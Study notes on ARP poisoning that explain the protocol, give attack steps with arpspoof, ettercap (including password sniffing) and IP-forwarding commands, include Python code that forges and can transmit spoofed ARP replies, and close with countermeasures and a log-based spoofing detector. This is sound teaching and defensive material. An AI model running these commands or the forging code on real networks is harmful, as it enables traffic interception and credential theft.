ARP poisoning
ARP
- ARP stands for "Address Resolution Protocol"
- In charge of resolving IP addresses to MAC addresses on a local network segment
- Can be used for obtaining MAC addresses of devices on the network
- Packets are `ARP_REQUEST` (opcode 1) and `ARP_REPLY` (opcode 2)
- Commands
  - `arp -a`: displays the current ARP cache
  - `arp -d *`: clears the ARP cache (Windows syntax; on Linux use `ip neigh flush all`)
ARP table
- Used to map IP addresses to MAC addresses (a cache of already resolved entries)
- Every network interface has its own ARP table
- If no ARP entry exists:
  - Computer A broadcasts an ARP request on the network asking for the MAC address of a specific IP.
  - Computer B, the owner of that IP, replies with its MAC and IP address
  - Computer A inserts the pair into its ARP table for future use
ARP poisoning attack
- Also known as: ARP spoofing, ARP cache poisoning, ARP poison routing, ARP cache flooding, ARP flooding.
- Man-in-the-middle attack between the victim and another host on the same segment, typically the default gateway: forged replies make both sides send their traffic to the attacker's MAC address.
- Floods the target machine's ARP cache with forged requests and responses.
- Exploits the fact that ARP has no authentication: a host accepts a reply without verifying that the sender really owns the IP address it claims.
- What happens when a table fills up depends on the manufacturer/implementation:
  - A switch whose MAC (CAM) table is overflowed (the related MAC flooding attack) may fall back to a fail-safe mode and behave like a hub, i.e. forward frames out of every port, so the attacker can sniff everything.
  - A Linux host whose ARP cache reaches its limit may:
    - Drop the oldest / most stale entry from the table (by the garbage collector)
    - Reject new entries
ARP poisoning attack steps
- Gather information
  - Get the victim's IP address, e.g. `192.168.122.183`
    - E.g. through host discovery using `nmap`, e.g. `nmap -sn 192.168.0.0/24`
  - Get the default gateway IP, e.g. `192.168.122.1`
    - Usually the address on the subnet ending with `.1`, but confirm it from the attacker machine's own routing table rather than guessing
    - Usually the same for everyone on the same network
    - The default gateway is the forwarding host (router) towards the internet, used when no other route matches the destination IP address of a packet.
- Enable IP forwarding so that intercepted traffic is relayed to its real destination: `echo 1 > /proc/sys/net/ipv4/ip_forward` on Linux.
  - Otherwise nothing passes through the attacker and you're just DoSing the victim, which is also very noticeable.
- Attack
  - Deceive the victim device by flooding it with forged ARP reply packets.
    - Each reply claims that the gateway's IP address is at the attacker's MAC address, so the victim's cache entry for the gateway is overwritten; the same is done towards the gateway for the victim's IP, so both directions of the conversation pass through the attacker.
  - Use an ARP spoofing tool, e.g.
    - `arpspoof` (from dsniff)
      - `arpspoof -i <iface> -t <victim-machine-ip> <default-gateway-ip>` (tells the victim that the gateway is at the attacker's MAC)
      - `arpspoof -i <iface> -t <default-gateway-ip> <victim-machine-ip>` (tells the gateway that the victim is at the attacker's MAC)
      - Run both, in separate terminals; on exit arpspoof re-ARPs the targets with the correct MACs
    - `ettercap`
      - Also sniffs passwords automatically
      - `ettercap -NaC <default-gateway-ip> <victim-machine-ip>` (legacy ettercap 0.6 syntax)
        - `N`: make it non-interactive
        - `a`: ARP poison
        - `C`: parse out passwords and usernames
      - Current ettercap-ng releases use e.g. `ettercap -T -q -i <iface> -M arp:remote /<default-gateway-ip>// /<victim-machine-ip>//` (text mode, quiet, ARP MITM against both targets)
    - Cain and Abel (Cain & Abel) on Windows
- Sniff
  - Capture the relayed traffic on the attacker's interface, e.g. with `tcpdump` or Wireshark; ettercap prints captured credentials itself
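The request/reply exchange from the ARP table section and the forged replies used in the attack steps above, as an added worked example (not code from these notes, arpspoof or ettercap): it builds and parses raw ARP frames with the standard library only, models two hosts whose caches trust every ARP packet addressed to them, and produces the two forged replies an ARP spoofer keeps re-sending. The MAC addresses and the `send_frame` helper are assumptions made for the example; `demo()` runs offline and needs no privileges.

```python
"""ARP request/reply framing and the forged replies used for ARP poisoning.
Added example for these notes; not code from arpspoof or ettercap. Standard
library only. MAC addresses are constructed; the IPs match the notes' examples."""
import struct
from typing import NamedTuple, Optional

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


class Arp(NamedTuple):
    op: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))

def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_frame(arp: Arp, dst_mac: str) -> bytes:
    """14-byte Ethernet header + 28-byte ARP body (RFC 826, IPv4 over Ethernet)."""
    eth = mac_bytes(dst_mac) + mac_bytes(arp.sender_mac) + struct.pack("!H", ETH_P_ARP)
    body = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, arp.op)  # htype, ptype, hlen, plen, opcode
            + mac_bytes(arp.sender_mac) + ip_bytes(arp.sender_ip)
            + mac_bytes(arp.target_mac) + ip_bytes(arp.target_ip))
    return eth + body


def parse_frame(frame: bytes) -> Arp:
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP variant")
    p = frame[22:42]
    return Arp(op, mac_str(p[0:6]), ip_str(p[6:10]), mac_str(p[10:16]), ip_str(p[16:20]))


class Host:
    """Toy host whose ARP cache, like the real protocol, trusts every ARP packet addressed to it."""

    def __init__(self, mac: str, ip: str):
        self.mac, self.ip, self.cache = mac, ip, {}

    def request(self, ip: str) -> bytes:
        """Broadcast 'who has <ip>? tell <self.ip>' (target MAC unknown, so all zeros)."""
        return build_frame(Arp(ARP_REQUEST, self.mac, self.ip, ZERO_MAC, ip), BROADCAST)

    def handle(self, frame: bytes) -> Optional[bytes]:
        """Process one frame; answers requests for our IP and returns that reply frame."""
        arp = parse_frame(frame)
        if arp.target_ip != self.ip:
            return None
        self.cache[arp.sender_ip] = arp.sender_mac  # no authenticity check: this is the flaw
        if arp.op == ARP_REQUEST:
            return build_frame(Arp(ARP_REPLY, self.mac, self.ip, arp.sender_mac, arp.sender_ip),
                               arp.sender_mac)
        return None


def spoof_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two forged replies an ARP spoofer keeps re-sending (what `arpspoof -t victim gateway`
    and `arpspoof -t gateway victim` put on the wire): each claims the other party's IP is at
    the attacker's MAC."""
    to_victim = build_frame(Arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip), victim_mac)
    to_gateway = build_frame(Arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip), gateway_mac)
    return to_victim, to_gateway


def send_frame(frame: bytes, iface: str) -> None:
    """Put a frame on the wire via Linux AF_PACKET (needs CAP_NET_RAW). Not used by demo()."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


def demo():
    """Victim's cached gateway MAC before/after poisoning, and gateway's cached victim MAC after."""
    victim = Host("52:54:00:aa:aa:aa", "192.168.122.183")
    gateway = Host("52:54:00:11:11:11", "192.168.122.1")
    attacker_mac = "52:54:00:ee:ee:ee"
    # 1. legitimate resolution: broadcast request, owner replies, cache filled
    victim.handle(gateway.handle(victim.request(gateway.ip)))
    before = victim.cache[gateway.ip]
    # 2. poisoning: both caches accept the forged replies although no request was sent
    to_victim, to_gateway = spoof_pair(attacker_mac, victim.mac, victim.ip, gateway.mac, gateway.ip)
    victim.handle(to_victim)
    gateway.handle(to_gateway)
    return before, victim.cache[gateway.ip], gateway.cache[victim.ip]


if __name__ == "__main__":
    print(demo())
```

Note that `handle()` updates the cache on a reply it never asked for; that is exactly the missing check that a static entry or Dynamic ARP Inspection supplies. Real tools resend `spoof_pair()` every second or two because the victim's legitimate entry would otherwise be restored when it re-resolves the gateway.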
ARP poisoning attack countermeasures
- Configure DHCP snooping (and, on top of it, Dynamic ARP Inspection) on the switch
- Add static IP-MAC entries to the cache, at least for the default gateway.
  - A static entry is never updated by received ARP replies, unlike a dynamic ARP cache entry.
- Use Intrusion Detection Systems (IDS) that watch for IP-to-MAC changes, e.g. arpwatch
ARP poisoning countermeasures
- ARP spoofing detection and prevention
  - Relies on some form of certification or cross-checking of ARP responses
  - Can be implemented on individual hosts, hypervisors or switches
  - E.g. the DHCP snooping feature of a switch OS builds an internal database of IP-MAC-port bindings from the DHCP leases it observes; Dynamic ARP Inspection then uses that database to drop ARP packets whose sender IP/MAC pair does not match.
  - Hosts with static IP addresses never appear in the DHCP binding database, so their ARP traffic would be rejected unless static entries (ARP ACLs) are configured for them on the switch.
- Static ARP entries
  - Manually mapping IP addresses to MAC addresses (maintaining ARP entries on every host)
  - A lot of administrative overhead, since every host and every NIC replacement has to be tracked
  - Provides only basic security
- OS security
  - By default Linux does not create a new cache entry from an unsolicited (gratuitous) ARP reply (`arp_accept` sysctl set to 0), but an existing entry such as the gateway's is still updated by a forged reply, which is why arpspoof works against Linux victims; this behaviour can often be configured in other OSes too
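The detection side of the countermeasures above, as an added example (not code from these notes or from any tool they mention): a small arpwatch-style analyser that reads ARP lines in the format printed by `tcpdump -eni <iface> arp`, cross-checks replies against requests it has seen, against a pinned (static) binding for the gateway, and against earlier answers, and flags a MAC that answers for several IPs. The `SAMPLE` lines are constructed for the example and replay the attack from the steps section; the alert names are my own.

```python
"""Passive ARP spoofing detection over captured ARP traffic (arpwatch-style).
Added example for these notes, not code from any tool mentioned on the page.
Input lines mimic `tcpdump -eni <iface> arp` output; SAMPLE is constructed:
attacker 52:54:00:ee:ee:ee poisons victim .183 and gateway .1."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

REQUEST = re.compile(r"Request who-has (\d+\.\d+\.\d+\.\d+)")
REPLY = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})")

SAMPLE = [
    "10:00:00.000001 52:54:00:aa:aa:aa > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: "
    "Request who-has 192.168.122.1 tell 192.168.122.183, length 28",
    "10:00:00.000420 52:54:00:11:11:11 > 52:54:00:aa:aa:aa, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.122.1 is-at 52:54:00:11:11:11, length 28",
    # forged: nobody asked, and it contradicts both the pinned gateway MAC and what was just learned
    "10:00:05.000000 52:54:00:ee:ee:ee > 52:54:00:aa:aa:aa, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.122.1 is-at 52:54:00:ee:ee:ee, length 28",
    # forged in the other direction: the same MAC now also claims the victim's IP
    "10:00:05.000100 52:54:00:ee:ee:ee > 52:54:00:11:11:11, ethertype ARP (0x0806), length 42: "
    "Reply 192.168.122.183 is-at 52:54:00:ee:ee:ee, length 28",
]


def analyze(lines: Iterable[str], pinned: Optional[Dict[str, str]] = None) -> List[Tuple[str, str]]:
    """Return (kind, detail) alerts.  `pinned` holds IP->MAC bindings known to be correct,
    the monitoring equivalent of a static ARP entry for the gateway."""
    pinned = pinned or {}
    learned: Dict[str, str] = {}               # ip -> mac, last mapping seen in a reply
    claims: Dict[str, set] = defaultdict(set)  # mac -> IPs it has answered for
    pending: set = set()                       # IPs with an outstanding request
    alerts: List[Tuple[str, str]] = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            pending.add(m.group(1))
            continue
        m = REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), m.group(2).lower()
        if ip in pending:
            pending.discard(ip)
        else:
            alerts.append(("unsolicited-reply", f"{ip} is-at {mac}"))
        if ip in pinned and pinned[ip] != mac:
            alerts.append(("pinned-mismatch", f"{ip} expected {pinned[ip]} got {mac}"))
        if ip in learned and learned[ip] != mac:
            alerts.append(("flip", f"{ip}: {learned[ip]} -> {mac}"))
        learned[ip] = mac
        if ip not in claims[mac]:
            claims[mac].add(ip)
            if len(claims[mac]) > 1:  # one NIC answering for several IPs: the MITM footprint
                alerts.append(("multi-ip-mac", f"{mac} claims {sorted(claims[mac])}"))
    return alerts


def demo() -> List[Tuple[str, str]]:
    return analyze(SAMPLE, pinned={"192.168.122.1": "52:54:00:11:11:11"})


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"[{kind}] {detail}")
```

On the sample the first two lines are clean and the two forged replies produce five alerts. The heuristics need tuning on a real network: a host announces itself with a gratuitous reply at boot (an unsolicited reply that is legitimate), a router or a VRRP pair legitimately answers for more than one IP, and a NIC replacement is a legitimate flip, which is why a pinned binding for the gateway is the one signal worth paging on.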